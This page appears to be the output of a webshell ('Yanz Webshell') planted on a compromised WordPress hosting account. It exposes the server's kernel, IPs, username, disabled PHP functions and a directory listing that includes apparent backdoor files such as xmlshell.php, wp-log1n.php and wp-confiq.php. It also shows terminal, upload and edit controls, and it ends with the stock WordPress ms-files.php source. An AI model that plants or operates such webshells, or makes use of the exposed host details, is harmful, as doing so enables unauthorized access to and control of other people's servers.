Attention:
Uname:
Php:
Hdd:
Cwd:

Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
8.1.33 Safe mode: OFF Datetime: 2025-12-14 16:36:45
2792.60 GB Free: 1880.94 GB (67%)
/home/kheruwym/public_html/ dr-xr-xr-x [ root ] [ home ] Text

Server IP:
202.131.4.21
Client IP:
216.73.216.89

[ Files ]	[ Logout ]

File manager

	Name	Size	Modify	Permissions	Actions
	[ . ]	dir	2025-11-28 13:13:32	dr-xr-xr-x	Rename Touch
	[ .. ]	dir	2025-12-11 23:22:37	drwx--x--x	Rename Touch
	[ .tmb ]	dir	2025-11-12 07:07:40	drwxrwxrwx	Rename Touch
	[ .well-known ]	dir	2025-11-12 07:07:35	drwxr-xr-x	Rename Touch
	[ 117cb ]	dir	2025-11-14 05:53:05	dr-xr-xr-x	Rename Touch
	[ 1d8b10 ]	dir	2025-11-14 08:28:52	drwxr-xr-x	Rename Touch
	[ cgi-bin ]	dir	2025-11-14 05:52:56	drwxr-xr-x	Rename Touch
	[ f4727b ]	dir	2025-11-19 07:48:55	drwxr-xr-x	Rename Touch
	[ images ]	dir	2025-11-14 05:52:56	drwxr-xr-x	Rename Touch
	[ wp-admin ]	dir	2025-11-26 03:07:13	drwxr-xr-x	Rename Touch
	[ wp-content ]	dir	2025-11-22 08:16:38	drwxr-xr-x	Rename Touch
	[ wp-includes ]	dir	2025-11-22 08:16:25	drwxr-xr-x	Rename Touch
	.htaccess	1.13 KB	2025-11-28 13:17:43	-r-xr-xr-x	Rename Touch Edit Download
	.htaccess.phpupgrader.57402773	1.31 KB	2022-05-09 06:47:34	-rw-r--r--	Rename Touch Edit Download
	.htaccess.phpupgrader.9e97ffcf	1.45 KB	2023-08-02 18:50:37	-rw-r--r--	Rename Touch Edit Download
	.htaccess.phpupgrader.initial	1.31 KB	2022-05-09 06:47:34	-rw-r--r--	Rename Touch Edit Download
	click.php	1.93 KB	2023-09-14 08:16:25	-r--r--r--	Rename Touch Edit Download
	defaults.php	1.93 KB	2023-07-21 03:50:14	-r--r--r--	Rename Touch Edit Download
	ex.php	5.96 KB	2025-11-28 13:13:32	-rw-r--r--	Rename Touch Edit Download
	header.php	0 B	2025-11-10 06:52:51	-rw-r--r--	Rename Touch Edit Download
	index.php	35.97 KB	2023-05-29 08:16:38	-r-xr-xr-x	Rename Touch Edit Download
	index.php0	35.97 KB	2023-09-11 08:16:37	-rwxr-xr-x	Rename Touch Edit Download
	item.php	1.29 KB	2023-08-18 08:15:39	-r--r--r--	Rename Touch Edit Download
	license.txt	19.44 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	mah.php	1.93 KB	2023-12-31 03:48:47	-r--r--r--	Rename Touch Edit Download
	networks.php	1.29 KB	2024-01-13 03:43:18	-r--r--r--	Rename Touch Edit Download
	options.php	1.93 KB	2023-12-03 08:16:25	-r--r--r--	Rename Touch Edit Download
	pages.php	1.44 KB	2023-07-28 08:15:18	-r--r--r--	Rename Touch Edit Download
	php.ini	40 B	2025-11-18 19:54:41	-rw-r--r--	Rename Touch Edit Download
	plugins.php	1.87 KB	2023-07-01 08:16:25	-r--r--r--	Rename Touch Edit Download
	product.php	2.03 KB	2023-04-16 03:50:14	-r--r--r--	Rename Touch Edit Download
	quoys.php	26.20 KB	2025-11-13 01:08:41	-rw-r--r--	Rename Touch Edit Download
	readme.html	7.25 KB	2025-09-30 22:02:04	-rw-r--r--	Rename Touch Edit Download
	robots.txt	364 B	2023-06-15 08:16:38	-r--r--r--	Rename Touch Edit Download
	search.php	1.46 KB	2023-12-19 08:16:38	-r--r--r--	Rename Touch Edit Download
	track.php	6.49 KB	2025-11-12 04:05:52	-rw-r--r--	Rename Touch Edit Download
	txets.php	5.89 KB	2025-11-12 06:13:57	-rw-r--r--	Rename Touch Edit Download
	wp-activate.php	7.21 KB	2024-04-02 19:31:34	-rw-r--r--	Rename Touch Edit Download
	wp-blog-header.php	347 B	2025-11-10 06:52:59	-rw-r--r--	Rename Touch Edit Download
	wp-comments-post.php	2.27 KB	2023-08-09 07:36:19	-rw-r--r--	Rename Touch Edit Download
	wp-config-sample.php	3.26 KB	2024-11-13 07:16:19	-rw-r--r--	Rename Touch Edit Download
	wp-config.php	3.12 KB	2022-02-15 07:01:10	-rw-------	Rename Touch Edit Download
	wp-confiq.php	0 B	2025-11-10 06:52:50	-rw-r--r--	Rename Touch Edit Download
	wp-cron.php	5.51 KB	2025-11-10 06:53:00	-rw-r--r--	Rename Touch Edit Download
	wp-load.php	3.84 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	wp-log1n.php	1.72 KB	2024-01-28 08:14:59	-r--r--r--	Rename Touch Edit Download
	wp-mail.php	8.52 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	wp-settings.php	29.38 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	wp-signup.php	33.71 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	wp-trackback.php	4.98 KB	2024-11-13 07:16:19	-rw-r--r--	Rename Touch Edit Download
	xmlrpc.php	3.13 KB	2025-04-15 21:48:40	-rw-r--r--	Rename Touch Edit Download
	xmlshell.php	243.86 KB	2025-11-13 16:26:34	-rw-r--r--	Rename Touch Edit Download

Change dir:	Read file:
Make dir: (Not writable)	Make file: (Not writable)
Terminal:	Upload file: (Not writable)

HEX

HEX

Server: Apache

System: Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64

User: kheruwym (1551)

PHP: 8.1.33

Disabled: exec,passthru,shell_exec,system

Upload Files

File: /home/kheruwym/public_html/wp-includes/ms-files.php

<?php
/**
 * Multisite upload handler.
 *
 * @since 3.0.0
 *
 * @package WordPress
 * @subpackage Multisite
 */

define( 'MS_FILES_REQUEST', true );
define( 'SHORTINIT', true );

/** Load WordPress Bootstrap */
require_once dirname( __DIR__ ) . '/wp-load.php';

if ( ! is_multisite() ) {
	die( 'Multisite support not enabled' );
}

ms_file_constants();

if ( '1' === $current_blog->archived || '1' === $current_blog->spam || '1' === $current_blog->deleted ) {
	status_header( 404 );
	die( '404 &#8212; File not found.' );
}

$file = rtrim( BLOGUPLOADDIR, '/' ) . '/' . str_replace( '..', '', $_GET['file'] );
if ( ! is_file( $file ) ) {
	status_header( 404 );
	die( '404 &#8212; File not found.' );
}

$mime = wp_check_filetype( $file );
if ( false === $mime['type'] && function_exists( 'mime_content_type' ) ) {
	$mime['type'] = mime_content_type( $file );
}

if ( $mime['type'] ) {
	$mimetype = $mime['type'];
} else {
	$mimetype = 'image/' . substr( $file, strrpos( $file, '.' ) + 1 );
}

header( 'Content-Type: ' . $mimetype ); // Always send this.
if ( ! str_contains( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS' ) ) {
	header( 'Content-Length: ' . filesize( $file ) );
}

// Optional support for X-Sendfile and X-Accel-Redirect.
if ( WPMU_ACCEL_REDIRECT ) {
	header( 'X-Accel-Redirect: ' . str_replace( WP_CONTENT_DIR, '', $file ) );
	exit;
} elseif ( WPMU_SENDFILE ) {
	header( 'X-Sendfile: ' . $file );
	exit;
}

$wp_last_modified = gmdate( 'D, d M Y H:i:s', filemtime( $file ) );
$wp_etag          = '"' . md5( $wp_last_modified ) . '"';

header( "Last-Modified: $wp_last_modified GMT" );
header( 'ETag: ' . $wp_etag );
header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + 100000000 ) . ' GMT' );

// Support for conditional GET - use stripslashes() to avoid formatting.php dependency.
if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) ) {
	$client_etag = stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] );
} else {
	$client_etag = '';
}

if ( isset( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ) ) {
	$client_last_modified = trim( $_SERVER['HTTP_IF_MODIFIED_SINCE'] );
} else {
	$client_last_modified = '';
}

// If string is empty, return 0. If not, attempt to parse into a timestamp.
$client_modified_timestamp = $client_last_modified ? strtotime( $client_last_modified ) : 0;

// Make a timestamp for our most recent modification.
$wp_modified_timestamp = strtotime( $wp_last_modified );

if ( ( $client_last_modified && $client_etag )
	? ( ( $client_modified_timestamp >= $wp_modified_timestamp ) && ( $client_etag === $wp_etag ) )
	: ( ( $client_modified_timestamp >= $wp_modified_timestamp ) || ( $client_etag === $wp_etag ) )
) {
	status_header( 304 );
	exit;
}

// If we made it this far, just serve the file.
readfile( $file );
flush();